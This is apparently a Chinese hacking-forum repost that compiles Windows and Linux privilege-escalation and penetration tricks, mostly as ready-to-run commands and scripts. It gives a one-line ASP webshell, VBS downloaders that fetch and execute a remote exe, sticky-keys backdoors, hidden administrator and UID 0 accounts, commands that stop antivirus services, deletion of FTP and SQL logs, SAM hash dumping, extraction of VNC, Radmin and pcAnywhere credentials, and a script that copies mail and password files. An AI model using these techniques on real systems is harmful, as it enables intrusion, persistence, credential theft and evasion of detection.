各种提权/渗透/经验/技巧总结
- 发表于
- 周边
原文由 sec[90sec] 分享
本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅。
本着共享之精神,方便各位黑阔、童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动~~
感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。
大部分内容转至t00ls原帖,自己又加了一部分,修正了下板式,原帖太乱了!部分技巧虽然简单,但是异常实用,高手请勿喷,菜鸟请虚心学习。
旁站路径问题:
1、读网站配置。
2、用以下VBS:
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{ " & Replace(Binds, ":", " } { ") & " }"
WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
Next
WScript.Echo "Path : " & VDirObj.Path
End If
Next
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp”或者“copy 脚本文件 X:\目标目录\X.asp”像目标目录写入webshell,或者还可以试试type命令。
WordPress 的平台,爆绝对路径的方法是:
url/wp-content/plugins/akismet/akismet.php url/wp-content/plugins/akismet/hello.php
phpMyAdmin 爆路径办法:
phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php
网站可能目录(注:一般是虚拟主机类):
data/htdocs.网站/网站/
CMD 下操作 VPN 相关知识、资料:
#允许administrator拨入该VPN:
netsh ras set user administrator permit
#禁止administrator拨入该VPN:
netsh ras set user administrator deny
#查看哪些用户可以拨入VPN:
netsh ras show user
#查看VPN分配IP的方式:
netsh ras ip show config
#使用地址池的方式分配IP:
netsh ras ip set addrassign method = pool
#地址池的范围是从192.168.3.1到192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
Cmd、Dos 命令行下添加 SQL 用户的方法:
需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:
exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
另类的加用户方法:
在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下JS:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
Cmd 访问控制权限控制:
命令如下:
cacls c: /e /t /g everyone:F #c盘everyone权限 cacls "目录" /d everyone #everyone不可读,包括admin
备注:反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 - 文件夹选项 - 使用简单的共享去掉即可。
3389 相关,以下配合PR更好:
a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)
b、内网环境(lcx.exe)
c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)
1.查询终端端口:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(十六进制为:0x7d8):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f
MySql添加管理员,需重启:
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。
(注:一直忽略了在偏僻角落的那个功能)
关闭常见杀软(把杀软所在的文件的所有权限去掉):
处理变态诺顿企业版:
net stop "Symantec AntiVirus" /y net stop "Symantec AntiVirus Definition Watcher" /y net stop "Symantec Event Manager" /y net stop "System Event Notification" /y net stop "Symantec Settings Manager" /y
麦咖啡:
net stop "McAfee McShield"
Symantec病毒日志:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs
Symantec病毒备份:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine
Nod32病毒备份:
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine
Nod32移除密码保护:
删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可
安装5次shift后门,沾滞键后门,替换SHIFT后门:
沾滞键后门:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
替换SHIFT后门:
attrib c:\windows\system32\sethc.exe -h -r -s attrib c:\windows\system32\dllcache\sethc.exe -h -r -s del c:\windows\system32\sethc.exe copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h +r +s attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
添加隐藏系统账号:
1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
2、导出注册表SAM下用户的两个键值。
3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
4、利用 Hacker Defender 把相关用户注册表隐藏。
安装 MSSQL 扩展后门:
USE master; EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll'; GRANT exec On xp_helpsystem TO public;
处理服务器MSFTP日志:
在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件...正在使用”。
当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。
当停止“msftpsvc”服务后可直接删除“ex011124.log”。
MSSQL查询分析器连接记录清除:
MSSQL 2000 位于注册表如下:
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到连接过的信息删除。
MSSQL 2005 是在:
C:\Documents and Settings\\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
防BT系统拦截技巧,可以使用远程下载shell:
<% Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) Dim Ads, Retrieval, GetRemoteData On Error Resume Next Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", s_RemoteFileUrl, False, "", "" .Send GetRemoteData = .ResponseBody End With Set Retrieval = Nothing Set Ads = Server.CreateObject("Adodb.Stream") With Ads .Type = 1 .Open .Write GetRemoteData .SaveToFile Server.MapPath(s_LocalFileName), 2 .Cancel() .Close() End With Set Ads = Nothing End Sub eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL" %>
防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。
VNC、Radmin、PcAnywhere 的提权方法:
VNC提权:
首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin提权:
Radmin 默认端口是4899,先获取密码和端口,如下位置:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
PcAnywhere提权:
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。
保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:
“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”
如果PcAnywhere安装在“D:\program\”文件夹下,那么PcAnywhere的密码文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。
搜狗输入法 PinyinUp.exe 提权:
搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:
“C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe”
搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。
WinWebMail 提权加用户:
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
1433 SA权限构建注入点:
<% strSQLServerName = "服务器ip" strSQLDBUserName = "数据库帐号" strSQLDBPassword = "数据库密码" strSQLDBName = "数据库名称" Set conn = server.CreateObject("ADODB.Connection") strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" conn.open strCon Dim rs, strSQL, id Set rs = server.CreateObject("ADODB.recordset") id = request("id") strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 rs.Close %>
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
渗透实战:
1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*" version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain dn: uid=manager,dc=ruc,dc=edu,dc=cn uid: manager objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: manager cn: manager dn: uid=superadmin,dc=ruc,dc=edu,dc=cn uid: superadmin objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: superadmin cn: superadmin dn: uid=admin,dc=ruc,dc=edu,dc=cn uid: admin objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: admin cn: admin dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn uid: dcp_anonymous objectClass: top objectClass: person objectClass: organizationalPerson objectClass: inetOrgPerson sn: dcp_anonymous cn: dcp_anonymous
2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain
3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*" version: 1 dn: objectClass: top namingContexts: dc=ruc,dc=edu,dc=cn supportedExtension: 2.16.840.1.113730.3.5.7 supportedExtension: 2.16.840.1.113730.3.5.8 supportedExtension: 1.3.6.1.4.1.4203.1.11.1 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25 supportedExtension: 2.16.840.1.113730.3.5.3 supportedExtension: 2.16.840.1.113730.3.5.5 supportedExtension: 2.16.840.1.113730.3.5.6 supportedExtension: 2.16.840.1.113730.3.5.4 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24 supportedExtension: 1.3.6.1.4.1.1466.20037 supportedExtension: 1.3.6.1.4.1.4203.1.11.3 supportedControl: 2.16.840.1.113730.3.4.2 supportedControl: 2.16.840.1.113730.3.4.3 supportedControl: 2.16.840.1.113730.3.4.4 supportedControl: 2.16.840.1.113730.3.4.5 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.16 supportedControl: 2.16.840.1.113730.3.4.15 supportedControl: 2.16.840.1.113730.3.4.17 supportedControl: 2.16.840.1.113730.3.4.19 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 supportedControl: 2.16.840.1.113730.3.4.14 supportedControl: 1.3.6.1.4.1.1466.29539.12 supportedControl: 2.16.840.1.113730.3.4.12 supportedControl: 2.16.840.1.113730.3.4.18 supportedControl: 2.16.840.1.113730.3.4.13 supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 supportedLDAPVersion: 2 supportedLDAPVersion: 3 vendorName: Sun Microsystems, Inc. vendorVersion: Sun-Java(tm)-System-Directory/6.2 dataversion: 020090516011411 netscapemdsuffix: cn=ldap://dc=webA:389 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举IP:showmount -e ip
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
1.查看rsync服务器上的列表:
rsync 210.51.X.X:: finance img_finance auto img_auto html_cms img_cms ent_cms ent_img ceshi res_img res_img_c2 chip chip_c2 ent_icms games gamesimg media mediaimg fashion res-fashion res-fo taobao-home res-taobao-home house res-house res-home res-edu res-ent res-labs res-news res-phtv res-media home edu news res-book
看相应的下级目录(注意一定要在目录后面添加上/)
rsync 210.51.X.X::htdocs_app/ rsync 210.51.X.X::auto/ rsync 210.51.X.X::edu/
2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/ http://app.finance.xxx.com/warn/nothack.txt
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
nc -vv baidu.com 80 GET HTTP://www.sina.com / HTTP/1.0 GET HTTP://WWW.sina.com:22 / HTTP/1.0
liunx 相关提权渗透技巧总结,五、SSH端口转发:
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
确定版本:
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
重新设置密码:
index.php?option=com_user&view=reset&layout=confirm
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
useradd -o -u 0 nothack
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
[argp@julius ~]$ uname -rsi * freebsd 7.3-RELEASE GENERIC * [argp@julius ~]$ sysctl vfs.usermount * vfs.usermount: 1 * [argp@julius ~]$ id * uid=1001(argp) gid=1001(argp) groups=1001(argp) * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex * [argp@julius ~]$ ./nfs_mount_ex * calling nmount()
文件夹打包:
1.tar打包:
tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/*
2.alzip打包(韩国)
alzip -a D:\WEB\ d:\web\*.rar
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
}
3.命令行RAR打包
rar a -k -r -s -m3 c:\1.rar c:\folder
提权先执行systeminfo
token 漏洞补丁号 KB956572
Churrasco kb952004
收集系统信息的脚本:
For windows:
--------------------------------------------------------------
@echo off echo #########system info collection systeminfo ver hostname net user net localgroup net localgroup administrators net user guest net user administrator echo #######at- with atq##### echo schtask /query echo echo ####task-list############# tasklist /svc echo echo ####net-work infomation ipconfig/all route print arp -a netstat -anipconfig /displaydns echo echo #######service############ sc query type= service state= all echo #######file-############## cd \ tree -F
----------------------------------------------------------------
For linux:
----------------------------------------------------------------
#!/bin/bash
echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo 'u'r id is' `id`
echo ###atq&crontab#####
atq
crontab -l
echo #####about var#####
set
echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh
echo ######service####
chkconfig --list
for i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
----------------------------------------------------------------------
Gethash 不免杀怎么获取本机 hash:
首先导出注册表:
Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦!
当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~
vbs 下载者:
1:
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
2:
On Error Resume Next:Dim iRemote,iLocal,s1,s2 iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
Cmd 下目录的操作技巧:
列出d的所有目录:
for /d %i in (d:\freehost\*) do @echo %i
把当前路径下文件夹的名字只有1-3个字母的显示出来:
for /d %i in (???) do @echo %i
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
for /r %i in (*.exe) do @echo %i
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
for /f %i in (c:\1.txt) do echo %i
delims=后的空格是分隔符,tokens是取第几个位置:
for /f "tokens=2 delims= " %i in (a.txt) do echo %i
Linux 系统下的一些常见路径:
/etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/conf/httpd.conf /var/www/htdocs/index.html /var/httpd/conf/php.ini /var/httpd/htdocs/index.php /var/httpd/conf/httpd.conf /var/httpd/htdocs/index.html /var/httpd/conf/php.ini /var/www/index.html /var/www/index.php /opt/www/conf/httpd.conf /opt/www/htdocs/index.php /opt/www/htdocs/index.html /usr/local/apache/htdocs/index.html /usr/local/apache/htdocs/index.php /usr/local/apache2/htdocs/index.html /usr/local/apache2/htdocs/index.php /usr/local/httpd2.2/htdocs/index.php /usr/local/httpd2.2/htdocs/index.html /tmp/apache/htdocs/index.html /tmp/apache/htdocs/index.php /etc/httpd/htdocs/index.php /etc/httpd/conf/httpd.conf /etc/httpd/htdocs/index.html /www/php/php.ini /www/php4/php.ini /www/php5/php.ini /www/conf/httpd.conf /www/htdocs/index.php /www/htdocs/index.html /usr/local/httpd/conf/httpd.conf /apache/apache/conf/httpd.conf /apache/apache2/conf/httpd.conf /etc/apache/apache.conf /etc/apache2/apache.conf /etc/apache/httpd.conf /etc/apache2/httpd.conf /etc/apache2/vhosts.d/00_default_vhost.conf /etc/apache2/sites-available/default /etc/phpmyadmin/config.inc.php /etc/mysql/my.cnf /etc/httpd/conf.d/php.conf /etc/httpd/conf.d/httpd.conf /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/logs/access_log /etc/httpd/logs/access.log /home/apache/conf/httpd.conf /home/apache2/conf/httpd.conf /var/log/apache/error_log /var/log/apache/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache2/access_log /var/log/apache2/access.log /var/www/logs/error_log /var/www/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/error_log /var/log/error.log /var/log/access_log /var/log/access.log /usr/local/apache/logs/access_logaccess_log.old /usr/local/apache/logs/error_logerror_log.old /etc/php.ini /bin/php.ini /etc/init.d/httpd /etc/init.d/mysql /etc/httpd/php.ini /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/etc/php.ini /usr/local/lib/php.ini /usr/local/php/lib/php.ini /usr/local/php4/lib/php.ini /usr/local/php4/php.ini /usr/local/php4/lib/php.ini /usr/local/php5/lib/php.ini /usr/local/php5/etc/php.ini /usr/local/php5/php5.ini /usr/local/apache/conf/php.ini /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/php.ini /etc/php4.4/fcgi/php.ini /etc/php4/apache/php.ini /etc/php4/apache2/php.ini /etc/php5/apache/php.ini /etc/php5/apache2/php.ini /etc/php/php.ini /etc/php/php4/php.ini /etc/php/apache/php.ini /etc/php/apache2/php.ini /web/conf/php.ini /usr/local/Zend/etc/php.ini /opt/xampp/etc/php.ini /var/local/www/conf/php.ini /var/local/www/conf/httpd.conf /etc/php/cgi/php.ini /etc/php4/cgi/php.ini /etc/php5/cgi/php.ini /php5/php.ini 